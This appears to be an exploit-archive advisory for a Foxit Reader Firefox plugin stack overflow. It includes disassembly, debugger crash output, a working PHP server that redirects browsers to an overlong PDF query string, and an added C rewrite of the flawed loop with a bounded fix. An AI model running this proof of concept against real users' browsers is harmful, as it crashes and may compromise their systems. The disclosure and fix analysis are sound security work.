Foxit Reader <= 5.4.4.1128 Firefox Plugin Stack Buffer Overflow

07 Jan 2013 00:00:00 | Reported by rgod | Type: zdt | Source: 0day.today

Code
<?php
/*
Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll Overlong
Query String Remote Stack Buffer Overflow PoC --------------------------- rgod
 
(listener)
 
Tested against Microsoft Windows
Mozilla Firefox 17.0.1
Foxit Reader 5.4.3.0920
Foxit Reader 5.4.4.1128
 
File: npFoxitReaderPlugin.dll
Version: 2.2.1.530
 
Product url: http://www.foxitsoftware.com/downloads/
Last version setup file: FoxitReader544.11281_enu_Setup.exe
 
Usage:
Launch this script from the command line, then browse to port 6666 with Firefox.
The same condition can also be triggered with a URL of this form:
 
http://192.168.0.1/x.pdf?[A x 1024]
 
The file must exist, or the server must respond with the proper Content-Type
header (application/pdf), so that Firefox hands the URL, query string included,
to the Foxit plugin.
 
vulnerable code, npFoxitReaderPlugin.dll:
 
;------------------------------------------------------------------------------
 L1000162F:
        push    ebx
        push    esi
        push    edi
        mov edi,ebp
        or  ecx,FFFFFFFFh
        xor eax,eax
        xor ebx,ebx
        xor esi,esi
        repne scasb
        not ecx
        dec ecx
        test    ecx,ecx
        jle L100016E4
 L1000164A:
        mov al,[esi+ebp]
        mov word ptr [esp+18h],0000h
        cmp al,25h
        jz  L10001661
        mov ecx,[esp+1Ch]
        mov [ebx+ecx],al
        jmp L100016CE
 L10001661:
        mov al,[esi+ebp+01h]
        cmp al,30h
        jl  L1000166D
        cmp al,39h
        jle L1000167D
 L1000166D:
        cmp al,41h
        jl  L10001675
        cmp al,46h
        jle L1000167D
 L10001675:
        cmp al,61h
        jl  L100016C6
        cmp al,66h
        jg  L100016C6
 L1000167D:
        mov dl,[esi+ebp+01h]
        inc esi
        inc esi
        lea ecx,[esp+10h]
        mov [esp+18h],dl
        push    ecx
        mov al,[esi+ebp]
        lea edx,[esp+1Ch]
        push    L100450D4
        push    edx
        mov [esp+25h],al
        call    SUB_L10006421
        mov eax,[esp+1Ch]
        lea ecx,[esp+24h]
        push    eax
        push    L100450D0
        push    ecx
        call    SUB_L100063CF
        mov eax,[esp+34h]
        mov dl,[esp+30h]
        add esp,00000018h
        mov [ebx+eax],dl
        jmp L100016CE
 L100016C6:
        mov ecx,[esp+1Ch]
        mov byte ptr [ebx+ecx],25h
 L100016CE:
        inc ebx
        mov edi,ebp
        or  ecx,FFFFFFFFh
        xor eax,eax
        inc esi
        repne scasb
        not ecx
        dec ecx
        cmp esi,ecx
        jl  L1000164A
 L100016E4:
        mov edx,[esp+1Ch]
        pop edi
        pop esi
        mov eax,00000001h
        mov byte ptr [ebx+edx],00h
        pop ebx
        pop ebp
        pop ecx
        retn
;------------------------------------------------------------------------------
 
This copy loop writes the decoded query string into a fixed-size stack buffer
(the destination pointer kept at [esp+1Ch]) and never checks the write index
(ebx) against the buffer size, so an overlong query string overwrites the saved
pointers on the stack. Attaching a debugger to plugin-container.exe (the Firefox
process that hosts NPAPI plugins) shows:
 
(f48.1778): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8
eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
npFoxitReaderPlugin!NP_GetEntryPoints+0x15672:
10016852 8906            mov     dword ptr [esi],eax  ds:0023:41414141=????????
...
Attempt to write to address 41414141
...
 
The SEH chain pointers are also overwritten.
*/
 
error_reporting(0);
 
set_time_limit(0);
 
$port = 6666;
 
// First response: bounce the browser to /x.pdf with a 1024-byte query string.
// The query string is what the plugin copies into its fixed-size stack buffer.
$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".
                "Server: Apache\r\n".
                "Location: /x.pdf?".str_repeat("A",1024)."\r\n".
                "Content-Type: text/html\r\n\r\n";
 
// Second response: headers only. Content-Type: application/pdf is what makes
// Firefox hand the URL (query string included) to npFoxitReaderPlugin.dll;
// no PDF body is needed, the overflow happens before any content is parsed.
$____boom     = "HTTP/1.1 200 OK\r\n".
                "Server: Apache\r\n".
                "Accept-Ranges: bytes\r\n".
                "Content-Length: 60137\r\n".
                "Content-Type: application/pdf\r\n".
                "Connection: keep-alive\r\n\r\n";
 
$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);
 
if (!$socket) {
  echo "$errstr ($errno)\n";
} else {
  echo "Listening on public tcp port ".$port." \n"; 
  while ($conn = stream_socket_accept($socket)) {
    // Only the request line matters, e.g. "GET /x.pdf?AAAA... HTTP/1.1".
    $line = fgets($conn);
    echo $line."\n";
    if (strpos($line, ".pdf") !== false) {
      fwrite($conn, $____boom);      // second request: serve the fake PDF headers
    }
    else {
      fwrite($conn, $____redirect);  // first request: redirect with the long query string
    }
    fclose($conn);
  }
  fclose($socket);
}
?>
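The percent-decoding loop at L1000162F, rewritten in C as an added example (this is not code from the advisory or from Foxit). It keeps the behaviour visible in the disassembly: one output byte per input character or per %XX escape, only the first hex digit validated, and no comparison of the write index against the size of the destination buffer. The two helper calls SUB_L10006421 and SUB_L100063CF are modelled as sscanf("%x") and a one-byte store; that is an assumption, since the format strings at L100450D4 and L100450D0 are not shown. The bounded variant beside it is the fix a practitioner would expect, and poc_query_fits() runs the PoC's 1024-byte query (constructed here) through it to show where the overflow comes from.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Reimplementation of the loop at L1000162F in npFoxitReaderPlugin.dll.
 * dst is the buffer whose address the plugin keeps at [esp+1Ch].  The loop
 * never compares the write index (ebx) against the size of dst, so the
 * caller's fixed-size stack buffer overflows as soon as the decoded query
 * string is longer than it.  SUB_L10006421 / SUB_L100063CF are modelled as
 * sscanf("%x") plus a byte store (assumption: their format strings are not
 * shown in the advisory).
 */
static int url_decode_unbounded(const char *src, char *dst)
{
    size_t len = strlen(src);          /* repne scasb / not ecx / dec ecx */
    size_t i = 0, j = 0;               /* esi = read index, ebx = write index */

    while (i < len) {
        unsigned char c = (unsigned char)src[i];
        if (c == '%' && isxdigit((unsigned char)src[i + 1])) {
            /* only the first hex digit is validated (cmp al,30h .. 66h);
               the second byte goes to the sscanf-like helper unchecked */
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            unsigned int v = 0;
            if (sscanf(hex, "%x", &v) != 1)
                v = 0;
            dst[j++] = (char)v;        /* mov [ebx+eax],dl */
            i += 3;                    /* inc esi twice here, once at L100016CE */
        } else {
            dst[j++] = (char)c;        /* literal byte, or '%' with no hex digit after it */
            i++;
        }
    }
    dst[j] = '\0';                     /* mov byte ptr [ebx+edx],00h */
    return 1;                          /* mov eax,00000001h */
}

/*
 * Hardened form: the caller passes the capacity of dst and the function
 * refuses to write past it.  Returns the decoded length, or -1 when the
 * output plus its terminator would not fit (dst is then left empty).
 * Both hex digits are validated before an escape is consumed.
 */
static int url_decode_bounded(const char *src, char *dst, size_t dstlen)
{
    size_t len = strlen(src);
    size_t i = 0, j = 0;

    if (dstlen == 0)
        return -1;
    while (i < len) {
        if (j + 1 >= dstlen) {         /* need room for this byte and the NUL */
            dst[0] = '\0';
            return -1;
        }
        unsigned char c = (unsigned char)src[i];
        if (c == '%' && isxdigit((unsigned char)src[i + 1])
                     && isxdigit((unsigned char)src[i + 2])) {
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            unsigned int v = 0;
            sscanf(hex, "%x", &v);
            dst[j++] = (char)v;
            i += 3;
        } else {
            dst[j++] = (char)c;
            i++;
        }
    }
    dst[j] = '\0';
    return (int)j;
}

/* Builds the PoC's query string (1024 'A's, constructed here) and reports how
   the bounded decoder fares with a destination buffer of the given size:
   the decoded length if it fits, -1 if it would overflow. */
static int poc_query_fits(size_t bufsize)
{
    char *query = malloc(1025);
    char *out = malloc(bufsize);
    int rc;

    if (!query || !out) {
        free(query);
        free(out);
        return -1;
    }
    memset(query, 'A', 1024);
    query[1024] = '\0';
    rc = url_decode_bounded(query, out, bufsize);
    free(query);
    free(out);
    return rc;
}

int main(void)
{
    char out[64];
    char small[16];

    url_decode_unbounded("x.pdf?%41%42%zz", out);
    printf("unbounded decode: %s\n", out);
    printf("bounded decode into 16 bytes: %d\n",
           url_decode_bounded("x.pdf?%41%42%zz", small, sizeof small));
    printf("PoC query into a 256-byte buffer: %d\n", poc_query_fits(256));
    printf("PoC query into a 2048-byte buffer: %d\n", poc_query_fits(2048));
    return 0;
}
```

Decoding can only shrink the input (a %XX escape becomes one byte), so the length of the query string itself is the bound the plugin needed to check before copying; either the bounded decoder above or rejecting any query longer than the destination buffer before decoding closes the hole. The PoC does not use any escapes at all: 1024 literal 'A's are enough because the loop copies them byte for byte.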

#  0day.today [2018-01-04]  #
